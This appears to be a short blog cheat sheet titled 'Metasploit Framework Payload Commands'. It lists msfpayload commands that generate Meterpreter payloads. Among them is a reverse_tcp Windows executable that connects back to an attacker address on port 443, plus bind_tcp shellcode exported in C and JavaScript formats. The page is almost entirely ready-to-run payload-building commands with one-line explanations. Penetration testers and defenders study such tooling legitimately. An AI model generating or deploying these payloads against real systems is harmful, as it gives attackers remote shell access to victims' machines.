Loading...

Metasploit Framework Payload Commands

Here is a list with the available payload commands.

msfpayload -l
List available payloads
msfpayload windows/meterpreter/bind_tcp O

List all available options for the windows/meterpreter/bind_tcp payload
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X >
payload.exe

Create a Meterpreter reverse_tcp payload to connect back to our IP on port 443.Then saves it as Windows executable file with the name payload.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R >
payload.raw

Create a Meterpreter reverse_tcp payload to connect back to our IP and saves it as raw format.It can be combined with msfencode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Export as C-formatted shellcode
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript
Hacking Tutorial 6970023045162785272

Post a Comment

emo-but-icon

Home item

Zebronics

Recommend on Google

Advertisements

Advertisements

Popular Posts

Random Posts

Recent Posts

ADS

eXTReMe Tracker